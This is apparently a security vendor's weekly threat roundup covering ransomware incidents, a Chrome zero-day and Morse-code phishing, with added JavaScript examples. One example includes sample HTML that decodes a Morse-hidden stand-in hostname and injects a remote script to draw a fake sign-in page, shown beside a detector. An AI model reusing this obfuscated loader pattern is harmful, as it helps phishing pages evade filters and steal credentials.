Cyberthreat update from Acronis CPOCs: Week of February 15, 2021

Here at Acronis, we’re always monitoring for dangers to your data, deploying updates to handle newly discovered vulnerabilities, and issuing alerts and recommendations to help you stay protected. Our global network of Acronis Cyber Protection Operations Centers (CPOCs) continues to work around the clock to proactively detect and defend against the latest cyberthreats.

Part of this work includes video updates to inform you of modern hazards in the digital landscape — such as ransomware strikes on major companies and new techniques seen in phishing campaigns. Here’s a look at some of the most recent breaking news and analyses:

Cyberpunk 2077 developer falls victim to ransomware attack

CD Projekt Red, the studio behind hit games like Cyberpunk 2077 and The Witcher 3: Wild Hunt, has disclosed that it suffered a ransomware attack. The company’s devices were encrypted and data, including source code for its games, was exfiltrated.

The Poland-based studio has over 1,000 employees, and even after a recent drop in value due to circumstances around its latest release, CD Projekt Red is still worth over $1 billion. This makes it a tempting target for cybercriminals, who aim to maximize their profits by going after companies that can afford to pay large ransoms.

Little information about the attack is publicly known, though researchers speculate based on leaked screenshots that the HelloKitty ransomware gang is responsible. The leaked source code has already been put up for auction on the dark web, with a starting price of $1 million.

With its AI-powered behavioral heuristic engine, Acronis Cyber Protect detects malicious patterns to stop both known and unknown ransomware variants in their tracks.

Patch issued for critical zero-day Chrome vulnerability

Google recently released a patch for the zero-day vulnerability CVE-2021-21148, a heap buffer overflow in the V8 JavaScript engine of the Chrome browser. This vulnerability has already been exploited in the wild.

CVE-2021-21148 could potentially allow a malicious website to execute arbitrary code on the victim’s computer. There have already been several critical browser flaws discovered in 2021 — Apple patched multiple zero-day vulnerabilities in the WebKit browser engine last month, while a South Korean security company reported a new Internet Explorer issue last week.

This issue has been fixed as of Chrome version 88.0.4324.150, though of course users are not protected until the update has been installed on their own system and the browser has been relaunched, since Chrome keeps running the old build until it restarts. The patch management capabilities in Acronis Cyber Protect automatically detect and retrieve new releases of critical third-party applications, while automated backups ensure the option for a quick rollback if any stability or incompatibility issues should arise.
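The check an inventory or patch-management script needs to make against this advisory is whether each endpoint’s installed Chrome build is at least 88.0.4324.150. The script below is an added example and is not code from the Acronis post or from any Acronis product; the hostnames and version strings in the inventory are constructed for illustration. Chrome versions have four numeric components and must be compared component by component as numbers, because a plain string comparison ranks 88.0.4324.96 above 88.0.4324.150.

```javascript
// Added example: decide whether reported Chrome builds carry the fix for
// CVE-2021-21148. Not from the Acronis post; inventory data is constructed.

const FIXED_VERSION = '88.0.4324.150'; // first build with the fix, per the advisory

// Chrome version strings are MAJOR.MINOR.BUILD.PATCH, all numeric.
function parseVersion(v) {
  const parts = v.trim().split('.');
  if (parts.length !== 4 || parts.some((p) => !/^\d+$/.test(p))) {
    throw new Error(`unexpected Chrome version string: ${v}`);
  }
  return parts.map(Number);
}

// Returns -1, 0 or 1 like a comparator, comparing numerically per component.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 4; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

function isPatched(installedVersion) {
  return compareVersions(installedVersion, FIXED_VERSION) >= 0;
}

// Constructed inventory, shaped like an endpoint-management export.
const INVENTORY = [
  { host: 'ws-01', chrome: '88.0.4324.96' },  // same branch, older patch level
  { host: 'ws-02', chrome: '88.0.4324.150' }, // exactly the fixed build
  { host: 'ws-03', chrome: '87.0.4280.141' }, // previous major release
  { host: 'ws-04', chrome: '88.0.4324.182' }, // later patch on the same branch
];

function unpatchedHosts(inventory) {
  return inventory.filter((e) => !isPatched(e.chrome)).map((e) => e.host);
}

// The pitfall: lexicographic comparison says the older build is the newer one,
// because '9' sorts after '1'. This returns true.
function naiveStringCompareIsWrong() {
  return '88.0.4324.96' > '88.0.4324.150';
}

console.log('hosts still exposed to CVE-2021-21148:', unpatchedHosts(INVENTORY));
console.log('string comparison gets it backwards:', naiveStringCompareIsWrong());
```

Feed the real version strings from your endpoint agent into `unpatchedHosts`; anything it returns should be pushed the update and relaunched rather than merely marked as having the update downloaded.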

Cybercriminals attack Brazilian utility companies, steal over 1,000 GB of data

Two state-owned Brazilian power utility companies were recently hit by ransomware in separate attacks.

Centrais Eletricas Brasileiras (Eletrobras), the largest power utility company in Latin America with over $12 billion in annual revenue, was targeted by an undisclosed ransomware group. The attackers managed to compromise the administrative network of the company’s nuclear power subsidiary, Eletronuclear. The operational network that manages nuclear plants was not accessed.

Companhia Paranaense de Energia (Copel) suffered a ransomware attack by Darkside. The attackers stole over 1,000 GB of sensitive data, including the company’s Active Directory database, which holds every domain account’s password hash. Those NT hashes can be cracked offline or replayed directly in pass-the-hash attacks, so a stolen directory database gives cybercriminals a ready foothold for follow-up attacks even after the ransomware itself has been cleaned up.

Ransomware, especially that which exfiltrates data, is a dominant and rapidly-evolving cyberthreat. Acronis Cyber Protect defends against any ransomware threat — new or old — with its behavioral heuristic engine to prevent damage to your network and loss of data.

Cerber ransomware returns after years of silence

Cerber was once the most prevalent ransomware family, a ransomware-as-a-service (RaaS) offering that at one point accounted for as much as 90% of all ransomware attacks on Windows-based systems. But by 2018, Cerber had seemingly disappeared from the cyberthreat landscape.

As of last year, Cerber appears to be back with a vengeance. Analysis of 239 million cyberattacks shows that Cerber was responsible for 58% of all ransomware attacks on the healthcare sector in 2020.

Cerber is distributed through phishing emails and malicious websites, techniques that remain highly effective at getting victims to install malware on their own systems, often because the payload poses as an update to software already installed. The multi-layered approach to cyber protection in Acronis Cyber Protect stops malware from executing before it can compromise your data, while URL filtering also blocks access to the malicious websites that host Cerber and other ransomware, preventing their download and installation from the start.

Morse code used to hide malicious URLs in phishing attacks

Many phishing attacks use some form of obfuscation to hide their code and malicious intent. Researchers recently discovered attackers using Morse code for that very purpose.

Attackers are side-stepping some cybersecurity solutions by encoding malicious domains as Morse code within an email, so the plaintext domain never appears for a filter that matches known-bad URLs; it is only reconstructed when the content is rendered. When accessed, these domains load scripts that render a fake sign-in page for Microsoft Office, prompting the victim to enter their user credentials. These usernames and passwords, of course, are simply captured by the cybercriminals.
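The following is an added example in JavaScript, not code from the Acronis post and not the actual campaign’s code. The post gives no details of the campaign’s encoding, so the example assumes a plain character-to-Morse mapping with symbols separated by spaces. It shows why such encoding defeats a scanner that matches plaintext hostnames, how a hostile script would rebuild its loader URL at run time, and a detector that finds Morse-like runs in the content and decodes them. The hostname login.example.com and the HTML snippet are constructed.

```javascript
// Added example: Morse-encoded hostnames versus plaintext URL matching.
// Not from the Acronis post; the encoding scheme, hostname and HTML are assumed.

const MORSE = {
  a: '.-', b: '-...', c: '-.-.', d: '-..', e: '.', f: '..-.', g: '--.', h: '....',
  i: '..', j: '.---', k: '-.-', l: '.-..', m: '--', n: '-.', o: '---', p: '.--.',
  q: '--.-', r: '.-.', s: '...', t: '-', u: '..-', v: '...-', w: '.--', x: '-..-',
  y: '-.--', z: '--..',
  0: '-----', 1: '.----', 2: '..---', 3: '...--', 4: '....-',
  5: '.....', 6: '-....', 7: '--...', 8: '---..', 9: '----.',
  '.': '.-.-.-', '-': '-....-', '/': '-..-.', ':': '---...',
};
// Reverse table for decoding: Morse symbol -> character.
const REVERSE = Object.fromEntries(Object.entries(MORSE).map(([ch, code]) => [code, ch]));

// Encode text as space-separated Morse symbols; unknown characters become '?'.
function morseEncode(text) {
  return [...text.toLowerCase()].map((ch) => MORSE[ch] || '?').join(' ');
}

// Decode space-separated Morse symbols back to text.
function morseDecode(code) {
  return code.trim().split(/\s+/).map((sym) => REVERSE[sym] || '?').join('');
}

// Constructed stand-in for the attacker's hostname. In the hostile script
// only this encoded form is present; the plaintext never appears on disk.
const ENCODED_HOST = morseEncode('login.example.com');

// What the hostile script does at run time: rebuild the URL of the script
// that draws the fake sign-in page, then (in a browser) inject it.
function buildLoaderUrl(encodedHost) {
  return 'https://' + morseDecode(encodedHost) + '/login.js';
}

// Constructed HTML resembling the attachment body. The hostname is only
// present in Morse form, so a plaintext match on it finds nothing.
const SAMPLE_HTML = [
  '<html><body><script>',
  `var h = "${ENCODED_HOST}";`,
  'var s = document.createElement("script");',
  's.src = "https://" + decodeHost(h) + "/login.js";',
  'document.head.appendChild(s);',
  '</script></body></html>',
].join('\n');

// A naive filter: does the known-bad hostname appear literally?
function containsPlaintextHost(html, host) {
  return html.includes(host);
}

// Detector: runs of five or more dot/dash symbols separated by whitespace are
// rare in legitimate HTML; extract them and decode each run.
const MORSE_RUN = /(?:[.\-]{1,6}\s+){4,}[.\-]{1,6}/g;
function extractMorseStrings(html) {
  return (html.match(MORSE_RUN) || []).map(morseDecode);
}

console.log('plaintext match finds the host:', containsPlaintextHost(SAMPLE_HTML, 'login.example.com'));
console.log('decoded Morse runs:', extractMorseStrings(SAMPLE_HTML));
console.log('loader URL the script would build:', buildLoaderUrl(ENCODED_HOST));
```

The decoded strings from `extractMorseStrings` can be run through the same domain reputation check that the plaintext filter applies, which is the point of the exercise: a filter that only inspects literal URLs sees nothing, while one that decodes the obfuscation layer first recovers the same indicator.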

A 2020 study found that 97% of users could not reliably tell a legitimate email from a well-crafted spear phishing email. Successful spear phishing attacks now cost companies an average of $1.6 million. The URL filtering capabilities in Acronis Cyber Protect can stop malware downloads and code execution by blocking malicious domains entirely.

# # #

For the latest reports on emerging cyberthreats from Acronis’ cyber protection experts, subscribe to the Acronis YouTube channel and receive our CPOC updates as they’re posted.